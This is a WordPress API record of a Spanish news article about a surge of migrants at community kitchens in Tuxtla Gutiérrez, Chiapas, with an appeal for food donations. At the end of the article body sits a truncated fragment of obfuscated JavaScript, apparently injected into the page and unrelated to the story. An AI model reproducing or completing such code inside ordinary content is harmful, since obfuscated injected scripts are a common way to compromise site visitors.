{"id":17055,"date":"2024-08-06T01:32:57","date_gmt":"2024-08-06T01:32:57","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17055"},"modified":"2024-08-06T01:32:58","modified_gmt":"2024-08-06T01:32:58","slug":"migrantes-llegan-en-oleadas-a-los-comedores-comunitarios","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17055","title":{"rendered":"Migrantes llegan en oleadas a los comedores comunitarios"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722907901251-1024x768.jpg\" alt=\"\" class=\"wp-image-17056\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722907901251-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722907901251-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722907901251-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722907901251.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/blockquote>\n\n\n\n<p>Javier Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; En los comedores comunitarios de la capital chiapaneca la solicitud de alimentos para personas en contexto de movilidad ha incrementado hasta un 300%.<\/p>\n\n\n\n<p>Beatriz Carrillo, coordinadora de los Comedores Guadalupanos en la capital chiapaneca inform\u00f3 que, en este a\u00f1o particularmente han tenido que redoblar esfuerzos para poder apoyar a esta poblaci\u00f3n que ha llegado en grupos mayores a Tuxtla, como nunca se hab\u00eda visto.<\/p>\n\n\n\n<p>Para tener una idea, hasta el a\u00f1o pasado se entregaban 120 platos de comida ahora son 280, incrementando con ello los costos monetarios, pero tambi\u00e9n los esfuerzos humanos.<\/p>\n\n\n\n<p>\u201cEstamos buscando bienhechores para que nos apoyen con los alimentos ya que aument\u00f3 demasiado la demanda, podr\u00edamos decir que, hasta un 300% y lo m\u00e1s pesado es que somos los mismos los que preparamos los alimentos\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Los voluntarios han tenido que dejar familia, hijos, nietos, \u201cahorita porque hay vacaciones nos est\u00e1n ayudando, apoyando, siempre hemos sido los mismos, hemos salido adelante\u201d.<\/p>\n\n\n\n<p>El equipo que apoya en la preparaci\u00f3n de alimentos y bebida, son 5-6 personas por d\u00eda, un servicio altruista cien por ciento.<\/p>\n\n\n\n<p>En la parte de los insumos tambi\u00e9n increment\u00f3 la demanda por ejemplo; si antes se preparaban cinco kilos de arroz, ahora son 10.<\/p>\n\n\n\n<p>\u201cHemos llegado a preparar hasta 12 kilos de arroz, por d\u00eda, se les da porciones suficientes para que se llenen y todo bien preparado\u201d, expres\u00f3.<\/p>\n\n\n\n<p>El Comedor comunitario lleva 16 a\u00f1os de existencia, y en todo este tiempo el personal no hab\u00eda observado la presencia de tantas personas extranjeras en la capital chiapaneca.<\/p>\n\n\n\n<p>\u201cEs la primera vez que observamos esta cantidad de hermanos migrantes, por eso pedimos el apoyo de la poblaci\u00f3n de quien nos pueda apoyar donando arroz, frijol, az\u00facar, sopa, carne, lo que puedan\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>A la personas que deseen sumarse a esta noble causa pueden realizar sus donativos, de lunes a viernes de 9 de la ma\u00f1ana a 2 de la tarde en la Parroquia de Guadalupe, o directamente el comedor comunitario.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Javier Jim\u00e9nez. 5 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; En los comedores comunitarios de la capital chiapaneca la solicitud de alimentos para personas en contexto de movilidad ha incrementado hasta un 300%. Beatriz Carrillo, coordinadora de los Comedores Guadalupanos en la capital chiapaneca inform\u00f3 que, en este a\u00f1o particularmente han tenido que redoblar esfuerzos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17056,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-17055","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17055"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17055\/revisions"}],"predecessor-version":[{"id":17057,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17055\/revisions\/17057"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17056"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}